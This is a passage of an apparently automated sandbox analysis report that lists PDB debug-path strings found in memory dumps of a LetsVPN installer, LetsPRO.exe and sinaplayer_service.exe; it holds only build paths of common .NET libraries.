              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.nativelibrary\obj\Release\netstandard2.0\SQLitePCLRaw.nativelibrary.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2381214379.0000000002834000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3950223249.00000000591D2000.00000002.00000001.01000000.0000002C.sdmp
              Source: Binary string: C:\WorkShop\SuperSocket.ClientEngine\obj\Release\SuperSocket.ClientEngine.pdb source: letsvpn-latest.exe, 00000013.00000003.2387260703.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry/net461-Windows_NT-Release/Microsoft.Win32.Registry.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2362731884.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/Microsoft.Toolkit.Uwp.Notifications/obj/Release/net461/Microsoft.Toolkit.Uwp.Notifications.pdb source: letsvpn-latest.exe, 00000013.00000003.2355870263.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: OriginalFilenameMono.Cecil.Pdb.dll6 source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/net461-Release/Microsoft.Win32.SystemEvents.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2363516673.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet.MsDelta\obj\Release\DeltaCompressionDotNet.MsDelta.pdb source: letsvpn-latest.exe, 00000013.00000003.2326863486.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdb source: letsvpn-latest.exe, 00000013.00000003.2380557489.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Permissions/net461-windows-Release/System.Security.Permissions.pdb source: letsvpn-latest.exe, 00000013.00000003.2474765747.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\39\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.ComponentModel.Annotations/netfx\System.ComponentModel.Annotations.pdb source: letsvpn-latest.exe, 00000013.00000003.2393362455.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Primitives\4.0.11.0\System.Net.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2444291104.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.nativelibrary\obj\Release\netstandard2.0\SQLitePCLRaw.nativelibrary.pdb source: letsvpn-latest.exe, 00000013.00000003.2381214379.0000000002834000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3950223249.00000000591D2000.00000002.00000001.01000000.0000002C.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.Watcher\4.0.2.0\System.IO.FileSystem.Watcher.pdb source: letsvpn-latest.exe, 00000013.00000003.2422786884.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Runtime.InteropServices.RuntimeInformation\net462\System.Runtime.InteropServices.RuntimeInformation.pdb source: letsvpn-latest.exe, 00000013.00000003.2456991625.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\LetsVPN\obj\Release\LetsPRO.pdb source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Reader\4.0.2.0\System.Resources.Reader.pdb source: letsvpn-latest.exe, 00000013.00000003.2452142789.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Xml/net461-windows-Release/System.Security.Cryptography.Xml.pdb source: letsvpn-latest.exe, 00000013.00000003.2474107011.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet.PatchApi\obj\Release\DeltaCompressionDotNet.PatchApi.pdb source: letsvpn-latest.exe, 00000013.00000003.2327691194.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection\4.1.2.0\System.Reflection.pdb source: letsvpn-latest.exe, 00000013.00000003.2451342015.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\obj\Release\net40\Mono.Cecil.pdb source: letsvpn-latest.exe, 00000013.00000003.2370416127.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\x64\e_sqlite3.pdb source: letsvpn-latest.exe, 00000013.00000003.2537272011.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.NetTcp.Facade/Release/net461/System.ServiceModel.NetTcp.pdb source: letsvpn-latest.exe, 00000013.00000003.2478798275.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\wpf_control\Microsoft.Web.WebView2.Wpf\obj\release\net45\Microsoft.Web.WebView2.Wpf.pdbon source: letsvpn-latest.exe, 00000013.00000003.2359617621.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Encoding\4.0.2.0\System.Security.Cryptography.Encoding.pdb source: letsvpn-latest.exe, 00000013.00000003.2471020373.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.batteries_v2.e_sqlite3.dynamic\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdb source: letsvpn-latest.exe, 00000013.00000003.2379837248.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Duplex.Facade/Release/net461/System.ServiceModel.Duplex.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2477469430.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Diagnostics.StackTrace/netfx\System.Diagnostics.StackTrace.pdb source: letsvpn-latest.exe, 00000013.00000003.2411809176.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Diagnostics.Tracing/netfx\System.Diagnostics.Tracing.pdb'MAM 3M_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2414306472.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.batteries_v2.e_sqlite3.dynamic\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2379837248.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Debug\4.0.11.0\System.Diagnostics.Debug.pdb source: letsvpn-latest.exe, 00000013.00000003.2408110163.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: FileDescriptionMono.Cecil.Pdb2 source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Mannelig\Dev\Projects\NET\WpfToastNotifications\Src\ToastNotifications\obj\Release\ToastNotifications.pdb source: letsvpn-latest.exe, 00000013.00000003.2505104084.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterCrashes\Microsoft.AppCenter.Crashes.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Crashes.pdb source: letsvpn-latest.exe, 00000013.00000003.2351921276.000000000283B000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3935799668.000000002F832000.00000002.00000001.01000000.00000029.sdmp
              Source: Binary string: C:\Users\Tommy\Documents\GitHub\Font-Awesome-WPF\src\WPF\FontAwesome.WPF\bin\Signed-Net40\FontAwesome.WPF.pdb source: letsvpn-latest.exe, 00000013.00000003.2329176650.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Drawing.Common/net461-Release/System.Drawing.Common.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2415149418.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Pdb.dlls, source: letsvpn-latest.exe, 00000013.00000003.2376519913.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2375693525.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2381616746.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2370247542.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2374330113.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2364107536.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2377335396.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2377822909.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2381114597.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2366376901.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2378990816.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2379744971.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2385038113.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2383638970.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2382636946.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2380459987.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2365391125.0000000000598000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Csp\4.0.2.0\System.Security.Cryptography.Csp.pdb4)N) @)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2470389956.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\GitWorkspace\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\net45\ICSharpCode.AvalonEdit.pdb source: letsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\winforms_control\Microsoft.Web.WebView2.WinForms\obj\release\net45\Microsoft.Web.WebView2.WinForms.pdb source: letsvpn-latest.exe, 00000013.00000003.2358108445.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Microsoft.Cci.Pdb source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Text.Encoding.CodePages/net461-windows-Release/System.Text.Encoding.CodePages.pdb source: letsvpn-latest.exe, 00000013.00000003.2482513419.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Pipes\4.0.2.0\System.IO.Pipes.pdbh) source: letsvpn-latest.exe, 00000013.00000003.2426656105.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Security\4.0.2.0\System.Net.Security.pdbT*n* `*_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2445404154.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\arm\e_sqlite3.pdb source: letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.ThreadPool\4.0.12.0\System.Threading.ThreadPool.pdb source: letsvpn-latest.exe, 00000013.00000003.2492831621.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\Microsoft.Win32.Primitives\4.0.3.0\Microsoft.Win32.Primitives.pdb|( source: letsvpn-latest.exe, 00000013.00000003.2360771712.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\IEUser\pusher-websocket-dotnet\PusherClient\obj\release\net46\PusherClient.pdb source: letsvpn-latest.exe, 00000013.00000003.2376617919.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: letsvpn-latest.exe, 00000013.00000003.2325389222.000000000283E000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000035.00000002.2771963199.000000000086D000.00000002.00000001.01000000.00000017.sdmp, LetsPRO.exe, 00000035.00000000.2754233915.000000000086D000.00000002.00000001.01000000.00000017.sdmp, LetsPRO.exe, 00000037.00000002.2836954621.000000000086D000.00000002.00000001.01000000.00000017.sdmp, LetsPRO.exe, 00000037.00000000.2823850009.000000000086D000.00000002.00000001.01000000.00000017.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Tools\4.0.1.0\System.Diagnostics.Tools.pdb source: letsvpn-latest.exe, 00000013.00000003.2413049289.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.Packaging/net461-Release/System.IO.Packaging.pdb source: letsvpn-latest.exe, 00000013.00000003.2425444699.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Threading.Overlapped/netfx\System.Threading.Overlapped.pdb source: letsvpn-latest.exe, 00000013.00000003.2485799565.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry/net461-Windows_NT-Release/Microsoft.Win32.Registry.pdb source: letsvpn-latest.exe, 00000013.00000003.2362731884.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\LetsVPNDomainModel\obj\Release\LetsVPNDomainModel.pdb+CEC 7C_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2348840467.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000002.2776724379.0000000005842000.00000002.00000001.01000000.0000001C.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Runtime.Serialization.Xml/netfx\System.Runtime.Serialization.Xml.pdb source: letsvpn-latest.exe, 00000013.00000003.2466181205.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlSerializer\4.0.11.0\System.Xml.XmlSerializer.pdbt+ source: letsvpn-latest.exe, 00000013.00000003.2503453732.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Globalization\4.0.11.0\System.Globalization.pdb source: letsvpn-latest.exe, 00000013.00000003.2418462698.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NameResolution\4.0.2.0\System.Net.NameResolution.pdb|( source: letsvpn-latest.exe, 00000013.00000003.2442323739.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Timer\4.0.1.0\System.Threading.Timer.pdb source: letsvpn-latest.exe, 00000013.00000003.2495322784.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Parallel\4.0.1.0\System.Linq.Parallel.pdb source: letsvpn-latest.exe, 00000013.00000003.2436479526.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Security.Cryptography.Algorithms/netfx\System.Security.Cryptography.Algorithms.pdb source: letsvpn-latest.exe, 00000013.00000003.2469273215.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.provider.dynamic_cdecl\obj\Release\netstandard2.0\SQLitePCLRaw.provider.dynamic_cdecl.pdb source: letsvpn-latest.exe, 00000013.00000003.2381721740.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.Primitives\4.1.2.0\System.ComponentModel.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2394827139.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/net461-Release/Microsoft.Bcl.AsyncInterfaces.pdb source: letsvpn-latest.exe, 00000013.00000003.2353177349.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/net461-windows-Release/System.Security.Cryptography.ProtectedData.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2473035374.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XPath\4.0.3.0\System.Xml.XPath.pdb source: letsvpn-latest.exe, 00000013.00000003.2502090326.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sharpcompress\src\SharpCompress\obj\Release\net45\SharpCompress.pdb source: letsvpn-latest.exe, 00000013.00000003.2383731148.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\obj\Squirrel\Release\net45\Squirrel.pdb source: letsvpn-latest.exe, 00000013.00000003.2385529733.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.CompilerServices.VisualC\4.0.2.0\System.Runtime.CompilerServices.VisualC.pdb@*Z* L*_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2454973040.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Runtime.Serialization.Primitives/netfx\System.Runtime.Serialization.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2463667544.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcr120.i386.pdb source: sinaplayer_service.exe, sinaplayer_service.exe, 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Principal\4.0.1.0\System.Security.Principal.pdb source: letsvpn-latest.exe, 00000013.00000003.2476153727.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcp120.i386.pdb source: sinaplayer_service.exe, sinaplayer_service.exe, 00000011.00000002.3901746176.000000006C641000.00000020.00000001.01000000.0000000C.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Diagnostics.Tracing/netfx\System.Diagnostics.Tracing.pdb source: letsvpn-latest.exe, 00000013.00000003.2414306472.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime\4.1.2.0\System.Runtime.pdb source: letsvpn-latest.exe, 00000013.00000003.2466635348.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Runtime.InteropServices.RuntimeInformation\net462\System.Runtime.InteropServices.RuntimeInformation.pdbxE source: letsvpn-latest.exe, 00000013.00000003.2456991625.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Writer\4.0.2.0\System.Resources.Writer.pdbl( source: letsvpn-latest.exe, 00000013.00000003.2453541303.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection\4.1.2.0\System.Reflection.pdbH,b, T,_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2451342015.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Numerics\4.0.1.0\System.Runtime.Numerics.pdb|( source: letsvpn-latest.exe, 00000013.00000003.2458044881.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\wpfanimatedgif\WpfAnimatedGif\obj\Release\net40\WpfAnimatedGif.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2507016219.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.RegularExpressions\4.1.1.0\System.Text.RegularExpressions.pdb source: letsvpn-latest.exe, 00000013.00000003.2484351644.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Ping\4.0.2.0\System.Net.Ping.pdb source: letsvpn-latest.exe, 00000013.00000003.2443629521.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Duplex.Facade/Release/net461/System.ServiceModel.Duplex.pdb source: letsvpn-latest.exe, 00000013.00000003.2477469430.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Contracts\4.0.1.0\System.Diagnostics.Contracts.pdb source: letsvpn-latest.exe, 00000013.00000003.2407310504.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/net461-Release/Microsoft.Bcl.AsyncInterfaces.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2353177349.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: WebView2Loader.dll.pdb source: letsvpn-latest.exe, 00000013.00000003.2540392620.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry.AccessControl/net461-windows-Release/Microsoft.Win32.Registry.AccessControl.pdb source: letsvpn-latest.exe, 00000013.00000003.2362053914.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\MdXaml\artifacts\obj\MdXaml\Release\net45\MdXaml.pdbSHA256/T source: letsvpn-latest.exe, 00000013.00000003.2350329188.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: netstandard.pdb.mdb source: letsvpn-latest.exe, 00000013.00000003.2324359693.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2370416127.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Primitives\4.0.2.0\System.Security.Cryptography.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2472307011.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Pdb.dll source: letsvpn-latest.exe, 00000013.00000003.2370247542.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2364107536.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2366376901.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2365391125.0000000000598000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net461-Release/System.Diagnostics.EventLog.pdbSHA256~ source: letsvpn-latest.exe, 00000013.00000003.2408789957.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Security.SecureString/netfx\System.Security.SecureString.pdbf) source: letsvpn-latest.exe, 00000013.00000003.2476800836.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdbH5b5 T5_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2457643638.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Reader\4.0.2.0\System.Resources.Reader.pdbl( source: letsvpn-latest.exe, 00000013.00000003.2452142789.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.TextWriterTraceListener\4.0.2.0\System.Diagnostics.TextWriterTraceListener.pdb source: letsvpn-latest.exe, 00000013.00000003.2412446400.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Web.Services.Description/Release/net461/System.Web.Services.Description.pdb source: letsvpn-latest.exe, 00000013.00000003.2498550743.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\pdb\obj\Release\net40\Mono.Cecil.Pdb.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.IsolatedStorage\4.0.2.0\System.IO.IsolatedStorage.pdb source: letsvpn-latest.exe, 00000013.00000003.2424061182.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Xml.XPath.XDocument/netfx\System.Xml.XPath.XDocument.pdb source: letsvpn-latest.exe, 00000013.00000003.2501368760.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.Odbc/net461-windows-Release/System.Data.Odbc.pdb source: letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Extract: Mono.Cecil.Pdb.dll... 100% source: letsvpn-latest.exe, 00000013.00000003.2376519913.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2480493118.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2537165268.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2551809584.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2421961932.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2441334701.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2518546129.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2471571110.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2527610213.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2417070007.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2451895859.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2478052167.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2474012912.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2457960734.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2420484632.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000002.2830202123.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2453367162.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2410871875.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2448548860.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 